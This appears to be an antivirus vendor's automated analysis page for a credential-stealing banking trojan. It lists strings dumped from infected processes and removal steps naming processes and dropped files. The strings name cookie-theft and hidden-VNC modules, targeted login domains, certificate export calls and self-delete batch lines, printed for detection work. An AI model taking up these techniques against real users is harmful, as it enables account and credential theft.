Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration

new.exe_3664_rwx_00130000_00047000:

.text
`.data
.reloc
update.exe
config.bin
%0&!%F
?)500>(8
7-52&<&,
,%)4.5(";$2
:'$!71689/
-0=).?,7
60/)4:5<
-*?)2<3:
>5;(4-2>)4 }744
"?5&"5%3%/
398>7="'
;!)5:. =##
Z#%xDVOE
(00(7> <$>59<&=3 =
$6>59$=1
^EXKSQN_^%X Sf
PR_OpenTCPSocket
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.0
hXXps://
GET /favicon.ico HTTP/1.1
HTTP/1.
X-WebKit-CSP
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
X-Type: %s
_getFirefoxCookie
hXXp://
atmos_hvnc.module
atmos_ffcookie.module
atmos_video.module
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
*.facebook.com
*.twitter.com
*.instagram.com
*.booking.com
*.sharepoint.com
*.yahoo.com
login.yahoo.com
*.google.com
accounts.google.com
192.168.*.*
127.0.0.1
*/wp-login.php*
*.xn--p1ai
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
SSSh8
9.tI3
CreatePipe
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
ExitWindowsEx
USER32.dll
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
Secur32.dll
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlW
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
NtQueryKey
ntdll.dll
PSSSSSSh
SSSh4
SUWt^Ht[Ht.Huc
2!242:2?2[2
Chrome
Firefox
nnspr4.dll
nss3.dll
chrome.dll
Process (u minute): %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
kernel32.dll
Global\XXX
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%sd1%
%sd2%
Name: %s
Path: %s
Hash: %s
Time: u.u.u
\StringFileInfo\xx\%s
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Rapport
sXXXX
d*.swf
*.flv
*.png
*.jpg
*.ico
*.gif
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data

new.exe_3664_rwx_00400000_0000F000:

.text
`.rdata
@.data
a%FnQU
GetProcessHeap
KERNEL32.dll
EnumChildWindows
EnumWindows
USER32.dll
\d.nC
v1%ULRg
]j'
)%uj>_
.io*U
dxKeY
ntdll.dll
setup.dat

Explorer.EXE_1572_rwx_01EA0000_00047000:

.text
`.data
.reloc
update.exe
config.bin
%0&!%F
?)500>(8
7-52&<&,
,%)4.5(";$2
:'$!71689/
-0=).?,7
60/)4:5<
-*?)2<3:
>5;(4-2>)4 }744
"?5&"5%3%/
398>7="'
;!)5:. =##
Z#%xDVOE
(00(7> <$>59<&=3 =
$6>59$=1
^EXKSQN_^%X Sf
PR_OpenTCPSocket
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.0
hXXps://
GET /favicon.ico HTTP/1.1
HTTP/1.
X-WebKit-CSP
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
X-Type: %s
_getFirefoxCookie
hXXp://
atmos_hvnc.module
atmos_ffcookie.module
atmos_video.module
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
*.facebook.com
*.twitter.com
*.instagram.com
*.booking.com
*.sharepoint.com
*.yahoo.com
login.yahoo.com
*.google.com
accounts.google.com
192.168.*.*
127.0.0.1
*/wp-login.php*
*.xn--p1ai
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
SSSh8
9.tI3
CreatePipe
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
ExitWindowsEx
USER32.dll
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
Secur32.dll
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlW
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
NtQueryKey
ntdll.dll
PSSSSSSh
SSSh4
SUWt^Ht[Ht.Huc
2!242:2?2[2
Chrome
Firefox
nnspr4.dll
nss3.dll
chrome.dll
Process (u minute): %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
kernel32.dll
Global\XXX
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%sd1%
%sd2%
Name: %s
Path: %s
Hash: %s
Time: u.u.u
\StringFileInfo\xx\%s
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Rapport
sXXXX
d*.swf
*.flv
*.png
*.jpg
*.ico
*.gif
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1480
    mofcomp.exe:3476
    WindowsXP-KB968930-x86-ENG.exe:3964
    new.exe:3064
    net1.exe:2460
    tasklist.exe:2264
    ngen.exe:3596
    ngen.exe:3168
    ngen.exe:3676
    ngen.exe:3300
    ngen.exe:856
    ngen.exe:2988
    ngen.exe:3172
    ngen.exe:1960
    ngen.exe:1944
    ngen.exe:420
    ngen.exe:916
    ngen.exe:3936
    ngen.exe:3996
    ngen.exe:1868
    ngen.exe:2188
    ngen.exe:2952
    ngen.exe:3560
    ngen.exe:3224
    ngen.exe:1724
    ngen.exe:3220
    ngen.exe:1976
    ngen.exe:2164
    ngen.exe:648
    update.exe:4040
    net.exe:2156
    net.exe:2224
    net.exe:2416
    hostname.exe:1384
    PSCustomSetupUtil.exe:620
    PSCustomSetupUtil.exe:452
    PSCustomSetupUtil.exe:3908
    PSCustomSetupUtil.exe:1924
    PSCustomSetupUtil.exe:2196
    PSCustomSetupUtil.exe:3064
    PSCustomSetupUtil.exe:2308
    PSCustomSetupUtil.exe:2224
    PSCustomSetupUtil.exe:3696
    PSCustomSetupUtil.exe:3856
    PSCustomSetupUtil.exe:2176
    PSCustomSetupUtil.exe:2244
    PSCustomSetupUtil.exe:2112
    PSCustomSetupUtil.exe:2240
    PSCustomSetupUtil.exe:3992
    PSCustomSetupUtil.exe:2288
    PSCustomSetupUtil.exe:2344
    PSCustomSetupUtil.exe:3952
    PSCustomSetupUtil.exe:2552
    PSCustomSetupUtil.exe:1496
    PSCustomSetupUtil.exe:264
    PSCustomSetupUtil.exe:1868
    PSCustomSetupUtil.exe:1284
    PSCustomSetupUtil.exe:2332
    PSCustomSetupUtil.exe:2556
    PSCustomSetupUtil.exe:2140
    ipconfig.exe:1240
    yfenaromaf.exe:1664
    PSSetupNativeUtils.exe:1932
    mscorsvw.exe:4008
    mscorsvw.exe:3128
    mscorsvw.exe:2592
    mscorsvw.exe:2732
    mscorsvw.exe:3104
    mscorsvw.exe:2284
    mscorsvw.exe:3484
    mscorsvw.exe:2168
    mscorsvw.exe:2072
    mscorsvw.exe:3084
    mscorsvw.exe:2408
    mscorsvw.exe:828
    regsvr32.exe:3404
    regsvr32.exe:3200
    wsmanhttpconfig.exe:3232
    wsmanhttpconfig.exe:1960
    netsh.exe:2304
    bindata865.exe:3088

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\Olifiqtu\yfenaromaf.exe (269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (7385 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpfa60f4ad.bat (177 bytes)
    %System%\wbem\Logs\mofcomp.log (1814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (1 bytes)
    C:\ea4acb66495575d6b9f323\powershell_ise.exe (2526 bytes)
    C:\ea4acb66495575d6b9f323\about_transactions.help.txt (1011 bytes)
    C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (17 bytes)
    C:\ea4acb66495575d6b9f323\wsmplpxy.dll (603 bytes)
    C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (12 bytes)
    C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (316 bytes)
    C:\ea4acb66495575d6b9f323\about_jobs.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\$shtdwn$.req (788 bytes)
    C:\ea4acb66495575d6b9f323\powershell.exe (7339 bytes)
    C:\ea4acb66495575d6b9f323\update\updspapi.dll (5940 bytes)
    C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (998 bytes)
    C:\ea4acb66495575d6b9f323\importallmodules.psd1 (438 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\winrm.vbs (2727 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\ea4acb66495575d6b9f323\update\update.exe (10748 bytes)
    C:\ea4acb66495575d6b9f323\about_job_details.help.txt (824 bytes)
    C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (950 bytes)
    C:\ea4acb66495575d6b9f323\about_locations.help.txt (794 bytes)
    C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (11 bytes)
    C:\ea4acb66495575d6b9f323\wsmauto.dll (1842 bytes)
    C:\ea4acb66495575d6b9f323\about_return.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\spuninst.exe (3787 bytes)
    C:\ea4acb66495575d6b9f323\about_remote.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\wevtfwd.dll (3351 bytes)
    C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (8 bytes)
    C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (16567 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\ea4acb66495575d6b9f323\about_arrays.help.txt (8 bytes)
    C:\ea4acb66495575d6b9f323\about_trap.help.txt (10 bytes)
    C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\ea4acb66495575d6b9f323\about_break.help.txt (792 bytes)
    C:\ea4acb66495575d6b9f323\registry.format.ps1xml (20 bytes)
    C:\ea4acb66495575d6b9f323\spmsg.dll (495 bytes)
    C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (133 bytes)
    C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (590 bytes)
    C:\ea4acb66495575d6b9f323\about_redirection.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\ea4acb66495575d6b9f323\about_aliases.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_operators.help.txt (770 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\ea4acb66495575d6b9f323\about_throw.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (21 bytes)
    C:\ea4acb66495575d6b9f323\wsmwmipl.dll (2816 bytes)
    C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\ea4acb66495575d6b9f323\wsmtxt.xsl (2 bytes)
    C:\ea4acb66495575d6b9f323\winrm.cmd (35 bytes)
    C:\ea4acb66495575d6b9f323\about_split.help.txt (10 bytes)
    C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\ea4acb66495575d6b9f323\about_history.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (13 bytes)
    C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (837 bytes)
    C:\ea4acb66495575d6b9f323\about_properties.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\pwrshplugin.dll (802 bytes)
    C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (344 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (481 bytes)
    C:\ea4acb66495575d6b9f323\about_signing.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\about_do.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\winrm.ini (1956 bytes)
    C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\ea4acb66495575d6b9f323\help.format.ps1xml (3947 bytes)
    C:\$Directory (800 bytes)
    C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (168 bytes)
    C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (14450 bytes)
    C:\ea4acb66495575d6b9f323\winrshost.exe (22 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (887 bytes)
    C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (411 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (13 bytes)
    C:\ea4acb66495575d6b9f323\winrsmgr.dll (2 bytes)
    C:\ea4acb66495575d6b9f323\wsmprovhost.exe (657 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (379 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (26041 bytes)
    C:\ea4acb66495575d6b9f323\about_functions.help.txt (586 bytes)
    C:\ea4acb66495575d6b9f323\about_providers.help.txt (59 bytes)
    C:\ea4acb66495575d6b9f323\wsmsvc.dll (15909 bytes)
    C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (37 bytes)
    C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (155 bytes)
    C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (595 bytes)
    C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (8 bytes)
    C:\ea4acb66495575d6b9f323\about_profiles.help.txt (457 bytes)
    C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (16 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (1145 bytes)
    C:\ea4acb66495575d6b9f323\powershell.exe.mui (10 bytes)
    C:\ea4acb66495575d6b9f323\about_for.help.txt (146 bytes)
    C:\ea4acb66495575d6b9f323\winrs.exe (1154 bytes)
    C:\ea4acb66495575d6b9f323\about_prompts.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\winrssrv.dll (12 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (146 bytes)
    C:\ea4acb66495575d6b9f323\pwrshsip.dll (24 bytes)
    C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (7 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (3386 bytes)
    C:\ea4acb66495575d6b9f323\about_parsing.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (14 bytes)
    C:\ea4acb66495575d6b9f323\update\spcustom.dll (23 bytes)
    C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\ea4acb66495575d6b9f323\about_objects.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (659 bytes)
    C:\ea4acb66495575d6b9f323\wsmres.dll (6164 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_switch.help.txt (489 bytes)
    C:\ea4acb66495575d6b9f323\about_methods.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\wsmpty.xsl (1 bytes)
    C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (11 bytes)
    C:\ea4acb66495575d6b9f323\update\eula.txt (586 bytes)
    C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\ea4acb66495575d6b9f323\default.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (15 bytes)
    C:\ea4acb66495575d6b9f323\about_continue.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (33 bytes)
    C:\ea4acb66495575d6b9f323\profile.ps1 (772 bytes)
    C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\ea4acb66495575d6b9f323\spupdsvc.exe (287 bytes)
    C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (276 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\ea4acb66495575d6b9f323\about_scripts.help.txt (12 bytes)
    C:\ea4acb66495575d6b9f323\eventforwarding.adm (2 bytes)
    C:\ea4acb66495575d6b9f323\about_foreach.help.txt (10 bytes)
    C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (13 bytes)
    C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (1492 bytes)
    C:\ea4acb66495575d6b9f323\winrmprov.dll (591 bytes)
    C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (266 bytes)
    C:\ea4acb66495575d6b9f323\about_join.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\about_ref.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\winrscmd.dll (2907 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\types.ps1xml (2510 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\ea4acb66495575d6b9f323\about_while.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (574 bytes)
    C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (3009 bytes)
    C:\ea4acb66495575d6b9f323\update\update.inf (2457 bytes)
    C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (3153 bytes)
    C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (9 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (9 bytes)
    C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (4 bytes)
    C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\wtrinstaller.ico (4803 bytes)
    C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (417 bytes)
    C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (512 bytes)
    C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (775 bytes)
    C:\ea4acb66495575d6b9f323\about_variables.help.txt (6 bytes)
    C:\ea4acb66495575d6b9f323\update\update.ver (14 bytes)
    C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\ea4acb66495575d6b9f323\winrmprov.mof (789 bytes)
    C:\ea4acb66495575d6b9f323\about_requires.help.txt (2 bytes)
    C:\ea4acb66495575d6b9f323\wsmauto.mof (4 bytes)
    C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (1 bytes)
    C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (221 bytes)
    C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (5 bytes)
    C:\ea4acb66495575d6b9f323\about_scopes.help.txt (76 bytes)
    C:\ea4acb66495575d6b9f323\pspluginwkr.dll (1756 bytes)
    C:\ea4acb66495575d6b9f323\about_modules.help.txt (13 bytes)
    C:\ea4acb66495575d6b9f323\about_if.help.txt (3 bytes)
    C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (9 bytes)
    C:\ea4acb66495575d6b9f323\pwrshmsg.dll (4 bytes)
    C:\ea4acb66495575d6b9f323\about_parameters.help.txt (9 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)
    %System%\GroupPolicy\Adm\SET3B.tmp (2 bytes)
    %WinDir%\ocmsn.log (7791 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (20 bytes)
    %System%\SET12.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETBC.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET3E.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SETD3.tmp (4 bytes)
    %System%\SET1B.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (10 bytes)
    %WinDir%\inf\SET1D.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (3 bytes)
    %System%\SET1A.tmp (789 bytes)
    %WinDir%\Help\SETCA.tmp (12287 bytes)
    %System%\WindowsPowerShell\v1.0\SETBE.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET41.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (950 bytes)
    %WinDir%\SECD5.tmp (1897 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET48.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET51.tmp (18248 bytes)
    %System%\winrm\0409\SET22.tmp (601 bytes)
    %System%\SET36.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (6 bytes)
    %System%\SET25.tmp (2 bytes)
    %System%\SET13.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET4E.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (17 bytes)
    %System%\SET14.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (10177 bytes)
    %WinDir%\inf\SET1E.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET8F.tmp (2 bytes)
    %System%\SET2A.tmp (1281 bytes)
    %System%\SETC4.tmp (42 bytes)
    %System%\SET19.tmp (25 bytes)
    %WinDir%\ntdtcsetup.log (22691 bytes)
    %WinDir%\inf\oem10.PNF (10040 bytes)
    %System%\SET2D.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (13 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\WindowsPowerShell\v1.0\SET3D.tmp (27 bytes)
    %System%\SET33.tmp (25 bytes)
    %WinDir%\msmqinst.log (5398 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (24 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (15 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (3 bytes)
    %System%\SETB.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (438 bytes)
    %System%\SET2B.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (8 bytes)
